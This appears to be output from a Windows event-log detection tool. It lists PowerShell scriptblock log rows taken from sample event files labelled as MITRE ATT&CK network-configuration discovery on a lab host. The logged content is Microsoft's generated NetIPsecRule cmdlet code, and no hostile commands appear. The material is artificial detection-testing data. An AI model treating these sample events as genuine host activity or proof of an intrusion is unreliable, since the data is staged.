[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHas",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"BeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AddressType'; ParameterType = 'Microsoft.PowerSh",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.786 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 